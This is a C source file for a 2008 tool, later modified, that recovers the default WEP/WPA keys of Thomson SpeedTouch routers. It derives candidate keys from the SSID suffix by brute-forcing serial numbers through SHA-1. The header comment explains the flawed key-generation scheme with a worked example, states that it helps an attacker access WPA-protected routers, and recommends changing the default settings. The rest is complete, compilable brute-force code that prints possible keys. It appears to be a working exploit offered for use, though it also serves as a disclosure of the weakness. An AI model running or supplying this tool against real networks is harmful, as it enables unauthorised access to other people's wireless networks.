/*
   **************************************************************************
   *                                                                        *
   * Default WEP/WPA key generation for Thomson series wireless routers     *
   *                                                                        *
   *   Date: March 15th 2008                                                *
   *   Author: Kevin Devine <wyse101@gmail.com>                             *
   *                                                                        *
   **************************************************************************

   AFAIK, this is a well known problem by some ISP.
   It is likely to affect any owner of a Thomson wireless router with 
   default settings installed.

   **************************************************************************

   The format of a serial number:

   CP YY WW PP XXX (CC)

   And from what i can tell of the following serial number taken from 
   router i received.

   CP 06 15 JT 109 (53)

   YY is the year produced.      ( 2006  ) ?
   WW is the week of year.       ( some week of April ) ?
   PP is the production code.    ( JT ) factory code?
   CC is the configuration code. ( 53 ) seems to be 00 - ZZ (0-9/A-Z)

   I can only guess that the XXX values represent the unit number

   **************************************************************************

   The key generation is simple enough.

   Take as example: "CP0615JT109 (53)"

   Remove the CC and PP values

     "CP0615109"

   Convert the XXX values to hexadecimal.

     "CP0615313039"

   Process with SHA-1

     742da831d2b657fa53d347301ec610e1ebf8a3d0

   The last 3 bytes are converted to 6 byte string, and appended to
   the word "SpeedTouch" which becomes the default SSID.

     "SpeedTouchF8A3D0"

   The first 5 bytes are converted to a 10 byte string which
   becomes the default WEP/WPA key.

    "742DA831D2"

   Thats it..
   **************************************************************************

   I was unable to determine if its possible to obtain the base serial
   number from the MAC, but it can't be ruled out.

   The method of recovery here using brute force attack of the 
   default SSID octets, is pretty lame..but is enough for now.

   Theoretically, with 3 octets, no more than ~2 attempts are required
   before successfully accessing the router.

   When only 2 octets are provided, (example:BT Voyager/Home Hub routers)
   more potential keys are generated, with further required attempts -
   an average of 80.

   This still improves odds of an attacker gaining access
   to WPA protected routers - more so if an attacker can capture a WPA 
   handshake and crack with Aircrack,Cain & Abel or offline with coWPAtty.
   
   Obviously the problem is with implementation of key/ssid generation
   and not WPA itself.
   **************************************************************************
   
   The only solution _right now_ is to have customers either turn off wireless
   (if its not being used), or change the default settings.

   To compile, use:

     gcc -fomit-frame-pointer -O3 -funroll-all-loops stkeys.c sha1.c -ostkeys
   
   Use OpenSSL SHA-1 for this to run faster..
   
   Example usage for ST585v6 router:
      
      SSID: "SpeedTouchF8A3D0":

   c:\stkeys -v -iF8A3D0

   Serial Number: CP0615**109 - potential key = 742DA831D2  <- this is the right one
   Serial Number: CP0621**AHJ - potential key = 00651124D9

   Found 2 potential keys.

   
   *******************************************************************************
   Modify by D-CeGa
*/

#include <stdio.h>
#include <getopt.h>
#include <string.h>
#include <stdlib.h>

#include "sha1.h"

#define SHA1Init SHA1Reset
#define SHA1Update SHA1Input
#define SHA1Final SHA1Result
#define SHA1_CTX SHA1Context

typedef unsigned char u8;
typedef unsigned int u32;

const u8 charTable[]="0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ";
const u8 hexTable[]="0123456789ABCDEF";
      u8 serial[13]={'C','P','0',0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00};

#define SERIAL_LENGTH 12
#define MAX_SSID_OCTETS 6
#define DEFAULT_KEY_SIZE 5

#define hexmsb(x)(hexTable[((x & 0xf0) >> 4)])
#define hexlsb(x)(hexTable[ (x & 0x0f)])

void usage(char **argv) {

    fprintf(stdout,"Error al procesar argumentos\n",*argv);
                 
    exit(0);
}

/*
 * convert hexadecimal ssid string to binary
 * return 0 on error or binary length of string
 *
 */
u32 str2ssid(u8 ssid[],u8 *str) {

    u8 *p,*q = ssid;
    u32 len = strlen(str);

    if( (len % 2) || (len > MAX_SSID_OCTETS) )
      return(0);

    for(p = str;(*p = toupper(*p)) && (strchr(hexTable,*p)) != 0;) {

      if(--len % 2) {
        *q = ((u8*)strchr(hexTable,*p++) - hexTable);
        *q <<= 4;
      }else {
        *q++ |= ((u8*)strchr(hexTable,*p++) - hexTable);
      }
    }
    return( (len) ? 0 : (p - str) / 2);
}

/*
 * print 5 bytes to output file
 *
 */
void dump_key(FILE *out, u8 *key) {
  
    u32 i;
    u8 *p = key;

    for(i = 0;i < DEFAULT_KEY_SIZE;i++)
      fprintf(out,"%.2X",*p++);

    fprintf(out,",");
}

int main(int argc, char **argv) {

    u8 sha1_digest[40]={0};
    u8 ssid[8]={0},buf[8]={0},year,week,x1,x2,x3;
    u32 keys = 0,ssidLen = 0,verbose = 0, opt = 0;
    u8 *p,*q,*strId = NULL;
    int s;
    int e;
    
    

    SHA1_CTX sha1_ctx;
    if(argc > 1) {
      while( (opt = getopt(argc, argv,"i:s:e:")) != -1) {

        switch(opt) {

          case 'i' :
            strId = optarg;
            break;

          case 's' :
            s = atoi(optarg);
            break;

          case 'e' :
            e = atoi(optarg);
            break;

          default:
            usage(argv);
        }
      }
      if(!strId) usage(argv);

      if(!(ssidLen = str2ssid(ssid,strId))) usage(argv);


        for(year = s;year <= e;year++) {
          serial[3] = year | '0';

          // 52 weeks of the year

          for(week = 1;week <= 52;week++) {
            
            serial[4] = (week / 10) + '0';
            serial[5] = (week % 10) + '0';

            for(x1 = 0;x1 < 36;x1++) {

              serial[6] = hexmsb(charTable[x1]);
              serial[7] = hexlsb(charTable[x1]);

              for(x2 = 0;x2 < 36;x2++) {

                serial[8] = hexmsb(charTable[x2]);
                serial[9] = hexlsb(charTable[x2]);

                for(x3 = 0;x3 < 36;x3++) {

                  serial[10] = hexmsb(charTable[x3]);
                  serial[11] = hexlsb(charTable[x3]);
                  
                  
                  // hash serial number with sha-

                  SHA1Init(&sha1_ctx);
                  SHA1Update(&sha1_ctx,serial,SERIAL_LENGTH);
                  SHA1Final(&sha1_ctx,sha1_digest);

                  // compare SSID octets with last number of bytes supplied
                  if(memcmp(&sha1_digest[(20-ssidLen)],ssid,ssidLen) == 0) {

                    memcpy(buf,serial,6);

                    fprintf(stdout,
                            "N. Serie: %s**%C%C%C Posible clave = ",
                            buf,charTable[x1],charTable[x2],charTable[x3]);
                    dump_key(stdout,sha1_digest);
                  }
                }
              }
            }
          }
        }
    }
    else {
        usage(argv);
    }
    return(0);
}
